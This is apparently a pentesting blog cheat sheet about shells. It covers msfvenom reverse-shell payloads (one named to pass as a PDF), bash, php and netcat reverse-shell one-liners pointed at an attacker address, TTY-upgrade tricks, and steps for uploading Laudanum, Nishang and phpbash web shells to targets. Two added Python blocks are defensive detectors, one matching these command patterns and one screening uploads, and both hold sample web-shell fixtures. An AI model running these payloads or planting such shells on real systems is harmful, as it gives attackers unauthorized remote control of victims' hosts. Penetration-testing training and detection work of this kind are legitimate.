
Pentesting - Shell

Create Custom Reverse Shell with online Tool

Interesting website for generating custom reverse shell

https://www.revshells.com/

Create Custom Reverse Shell with msfvenom

Syntax:

msfvenom -p <architecture> LHOST=<IP> LPORT=<port> -f <formatPayload> > <outputFile>

Example - create ELF file (Linux executable):

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

Example - create EXE file (Windows executable):

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

Examples Reverse Shell

bash

Command syntax:

bash -i >& /dev/tcp/<IP>/<port> 0>&1

php

Or

php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

netcat

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f

More reverse shells: ironHackers

On Windows:

nc.exe -nv <IP> <port> -e cmd.exe

On Linux:

nc -nv <IP> <port> -e /bin/bash

Establish the Connection

Syntax (listener on the attacking host, waiting for the reverse connection):

nc -nlvp <port>

Escape Restricted Shell

One way to escape a restricted shell is to have ssh run the command at login, before the restricted session is opened:

ssh user@10.129.13.173 -t "whoami"

Interactive Shell (TTY)

Once a shell is obtained, it should always be upgraded to an interactive TTY:

python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
/bin/bash -i
echo os.system("/bin/bash")
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
!sh
/bin/sh -i
awk 'BEGIN {system("/bin/sh")}'
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'
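Added detection example, not code from the original post: a small Python scanner that flags process command lines matching the reverse-shell, netcat, TTY-upgrade and shell-spawn patterns listed in the sections above (it also covers the msfvenom invocation from the start of the page). The log format (`ts host uid=N cmd=<command line>`) and the sample lines are constructed for this example; the IP and port are the post's own placeholders. Each rule is one regex, so the same list can be ported to auditd, EDR or SIEM queries.

```python
"""Added detection example (not part of the original post): flag process
command lines that match the reverse-shell and TTY-upgrade patterns listed
in this cheat sheet. The log format (ts host uid=N cmd=<command>) and the
sample lines are constructed for this example."""
import re

# One (label, regex) pair per technique from the cheat sheet above.
RULES = [
    ("bash /dev/tcp reverse shell",
     re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
    ("php fsockopen reverse shell",
     re.compile(r"fsockopen\s*\(.*?\).*?\b(?:exec|system|passthru|proc_open|popen)\s*\(")),
    ("netcat mkfifo reverse shell",
     re.compile(r"mkfifo\s+\S+.*\|\s*(?:nc|ncat|netcat)\s+\S+\s+\d+")),
    ("netcat -e shell",
     re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+(?:\S*sh|cmd(?:\.exe)?)\b")),
    ("python pty upgrade",
     re.compile(r"pty\.spawn\s*\(")),
    ("shell spawned via awk/find/vim",
     re.compile(r"system\s*\(\s*[\"']/bin/(?:ba)?sh|-exec\s+/bin/(?:ba)?sh\b|vim\s+-c\s+['\"]?:!")),
    ("msfvenom payload generation",
     re.compile(r"\bmsfvenom\b.*\s-p\s+\S+.*\bLHOST=")),
]

# Constructed sample log in the assumed format; lines 7 and 8 are benign noise.
SAMPLE_LOG = [
    '2024-05-01T10:00:01Z web01 uid=33 cmd=bash -i >& /dev/tcp/10.10.14.113/443 0>&1',
    '2024-05-01T10:00:02Z web01 uid=33 cmd=php -r \'$sock=fsockopen("10.10.14.113",443);exec("/bin/sh -i <&3 >&3 2>&3");\'',
    '2024-05-01T10:00:03Z web01 uid=33 cmd=rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.113 443 >/tmp/f',
    '2024-05-01T10:00:04Z web01 uid=33 cmd=nc -nv 10.10.14.113 443 -e /bin/bash',
    '2024-05-01T10:00:05Z web01 uid=33 cmd=python3 -c \'import pty;pty.spawn("/bin/bash")\'',
    '2024-05-01T10:00:06Z web01 uid=33 cmd=find . -exec /bin/sh \\; -quit',
    '2024-05-01T10:00:07Z web01 uid=1000 cmd=ls -la /var/www/html',
    '2024-05-01T10:00:08Z web01 uid=1000 cmd=tar czf /srv/backup.tgz /srv/data',
    '2024-05-01T10:00:09Z ws07 uid=1001 cmd=msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > payload.exe',
]


def classify(cmdline: str) -> list:
    """Return the labels of every rule that matches one command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def parse_log_line(line: str):
    """Split an assumed 'ts host uid=N cmd=<command>' line into fields."""
    head, sep, cmd = line.partition(" cmd=")
    if not sep:
        return None
    ts, host, uid = head.split()
    return {"ts": ts, "host": host, "uid": uid.removeprefix("uid="), "cmd": cmd}


def scan(lines) -> list:
    """Return one alert dict per (log line, matching rule) pair."""
    alerts = []
    for n, line in enumerate(lines, 1):
        rec = parse_log_line(line)
        if rec is None:
            continue
        for label in classify(rec["cmd"]):
            alerts.append({"line": n, "host": rec["host"], "uid": rec["uid"],
                           "rule": label, "cmd": rec["cmd"]})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"line {a['line']:>2} {a['host']} uid={a['uid']} [{a['rule']}] {a['cmd']}")
```

Running the block prints seven alerts (lines 1 to 6 and 9) and nothing for the two benign commands. The rules are deliberately narrow; in production, pair them with parent-process context (a web server user spawning `bash`, `nc` or `python` is itself suspicious) rather than relying on command-line text alone.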

Webshells

Repository Laudanum

Laudanum is a collection of pre-built web shell files designed to be uploaded to a target system so that the attacker gains access, typically through a reverse shell. It allows running commands on the victim's host directly from the browser and ships injectable files for several web application languages (asp, aspx, jsp, php and others). The repository gives attackers a set of ready-made tools for exploiting web application vulnerabilities and gaining unauthorized access to targeted systems.

Github laudanum

Laudanum Demonstration

  1. Move a copy for modification:

cp /usr/share/webshells/laudanum/aspx/shell.aspx /home/tester/demo.aspx

  2. Modify the shell for use.
  3. Take advantage of the upload function (if one exists in the web application).
  4. Once the upload is successful, navigate to the web shell in the browser to use its functions.

Repository Nishang

Nishang is an offensive PowerShell toolset that provides options for every phase of a pentest.

https://github.com/samratashok/nishang

Demonstration

  1. Move a copy for modification:

cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx

  2. Follow the same steps as in the previous section.

PHP web shells

Github Repository PHP webshell

Webshell in PHP with Graphic interface:

https://github.com/Arrexel/phpbash
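Added example, not code from the original post or from the Laudanum, Nishang or phpbash projects: a Python screen for an upload handler that checks a file for web-shell indicators in the languages those repositories target (php, asp, aspx, jsp). The upload allow-list, the magic-byte table and the sample files are assumptions constructed for this example; the sample "shells" are minimal detection fixtures of the kind the page's repositories contain, not working tooling.

```python
"""Added example (not part of the original post or of Laudanum, Nishang or
phpbash): screen an uploaded file for web-shell indicators. The allow-list,
magic-byte table and sample files are assumptions for illustration."""
import os
import re

# Assumed upload policy: only these extensions are accepted by the upload form.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}
# Extensions a server may execute even when hidden mid-name (e.g. x.php.jpg).
SCRIPT_EXTENSIONS = {"php", "phtml", "php3", "php5", "asp", "aspx", "jsp", "jspx"}
# Leading magic bytes expected for each allowed type.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
         ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8", ".pdf": b"%PDF-"}

# Markers of server-side code, calls that run OS commands, and request input.
SERVER_CODE = re.compile(rb"<\?php|<\?=|<%@|<%|<script\s+runat=[\"']server", re.I)
EXEC_CALLS = re.compile(
    rb"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\("
    rb"|Process\.Start|ProcessStartInfo|Runtime\.getRuntime\(\)\.exec"
    rb"|ProcessBuilder|WScript\.Shell", re.I)
REQUEST_INPUT = re.compile(
    rb"\$_(?:GET|POST|REQUEST|COOKIE)\b|Request(?:\.Form|\.QueryString|\[)"
    rb"|getParameter\s*\(", re.I)

# Constructed detection fixtures: two legitimate files, four web-shell shapes.
SAMPLES = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "report.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
    "cmd.php": b"<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>",
    "Upload.aspx": b'<%@ Page Language="C#" %><script runat="server">void Run(){'
                   b' var p=new System.Diagnostics.ProcessStartInfo("cmd.exe","/c "+Request.Form["c"]);'
                   b' System.Diagnostics.Process.Start(p);}</script>',
    "avatar.php.jpg": b"\xff\xd8\xff\xe0" + b"<?php echo shell_exec($_GET['c']); ?>",
    "notes.jsp": b'<%@ page import="java.io.*" %><% Runtime.getRuntime().exec(request.getParameter("c")); %>',
}


def assess_upload(filename: str, content: bytes) -> dict:
    """Return {'verdict': 'allow'|'block', 'reasons': [...]} for one upload."""
    reasons = []
    ext = os.path.splitext(filename.lower())[1]
    inner = filename.lower().split(".")[1:-1]          # extensions hidden mid-name
    if ext not in ALLOWED_EXTENSIONS:
        reasons.append(f"extension {ext!r} not in upload allow-list")
    if any(part in SCRIPT_EXTENSIONS for part in inner):
        reasons.append("double extension hides a script extension")
    if ext in MAGIC and not content.startswith(MAGIC[ext]):
        reasons.append(f"content does not start with the {ext} magic bytes")
    if SERVER_CODE.search(content):
        reasons.append("server-side code marker found in content")
        if EXEC_CALLS.search(content):
            reasons.append("OS command execution call found")
        if REQUEST_INPUT.search(content):
            reasons.append("request parameters reach the code (command channel)")
    return {"verdict": "block" if reasons else "allow", "reasons": reasons}


def scan_uploads(files: dict) -> dict:
    """Assess every (name -> bytes) entry and return name -> result."""
    return {name: assess_upload(name, data) for name, data in files.items()}


if __name__ == "__main__":
    for name, result in scan_uploads(SAMPLES).items():
        print(f"{name:16} {result['verdict']:5} {'; '.join(result['reasons'])}")
```

The four fixtures are blocked and the two genuine files pass. The content checks matter because the extension and magic checks alone are bypassed by the `avatar.php.jpg` case (valid JPEG header, script extension hidden in the middle of the name), which is exactly the shape used against upload functions like the one in the Laudanum walkthrough above; storing uploads outside the web root and serving them with a fixed content type closes the gap the detector only reports.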

This post is licensed under CC BY 4.0 by the author.